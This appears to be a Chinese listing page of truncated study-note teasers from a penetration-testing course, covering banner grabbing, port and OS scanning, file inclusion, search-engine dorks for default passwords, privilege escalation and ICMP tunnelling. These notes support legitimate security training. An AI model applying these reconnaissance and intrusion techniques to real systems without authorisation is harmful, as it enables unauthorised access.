1.简述 识别开放端口上的应用 识别目标操作系统 提高攻击效率 2.分类 Banner信息获取服务识别操作系统识别snmp分析防火墙识别 3.Banner(1).含义 在等定的时间或场景中显示... 查看详情
安全牛学习笔记手动漏洞挖掘
手动漏洞挖掘Directorytravarsal/Fileinclude(有区别/没区别) 目录权限限制不严/文件包含/etc/php5/cgi/php.ini allow_url_include=on应用程序功能操作文件,限制不严时导致访问WEB目录以外的文件 读、写文件、远程执行代... 查看详情
安全牛学习笔记手动漏洞挖掘
手动漏洞挖掘Directorytravarsal/Fileinclude(有区别/没区别) 目录权限限制不严/文件包含/etc/php5/cgi/php.ini allow_url_include=on应用程序功能操作文件,限制不严时导致访问WEB目录以外的文件 读、写文件、远程执行代... 查看详情
安全牛学习笔记
弱点扫描╋━━━━━━━━━━━━━━━━━━━━╋┃发现弱点 ┃┃发现漏洞 & 查看详情
安全牛学习笔记搜索引擎
搜索引擎 shodan爬取banner信息。搜索联网设备。常用关键字: netcitycountryCNportoshostname实例:cisco200ok思科设备defaultpassword默认密码 google 语法: +-ORinurlallinurlintitleallintitlesitelink 实例: 查看详情
安全牛学习笔记fuzzing
FUZZING╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃FUZZING &nb 查看详情
安全牛学习笔记提权
WindowsuserAdministratorSystemLinuxUserRootwindows提权将admin提权为systemnet user命令 查看账户Guest 用户,权限很小HelpAssistant用户,远程协助账号Windowssystem账号系统设置管理功能SysInternalSuite工具https://technet.microsoft.c 查看详情
安全牛学习笔记wpa安全系统
WAP安全系统 & 查看详情
安全牛学习笔记操作系统识别
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂Security+认证为什么是互联网+时代最火爆的认证? 牛妹先给大家介绍一下Security+ Security+认证是一种中立第... 查看详情
安全牛学习笔记端口扫描
端口扫描╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃隐蔽端口扫描 查看详情
安全牛学习笔记csrf
╋━━━━━━━━━━━━━━━━━━━━━━━╋┃CSRF ┃┃Cross-siterequestforgery 查看详情
安全牛学习笔记漏洞挖掘
漏洞本质 数据与指令的混淆 对用户输入信息过滤不严,误将指令当做数据 漏洞挖掘原则 所有变量所有头 cookie中的变量逐个变量删除筛选 身份认证 弱口令/基于字典的爆破 ... 查看详情
安全牛学习笔记nessus
NESSUS╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃NESSUS &nbs 查看详情
安全牛学习笔记nmap
NMAP╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃NMAP &nbs... 查看详情
安全牛学习笔记ptunnle
ptunnle PingtunnelICMP隧道工具 & 查看详情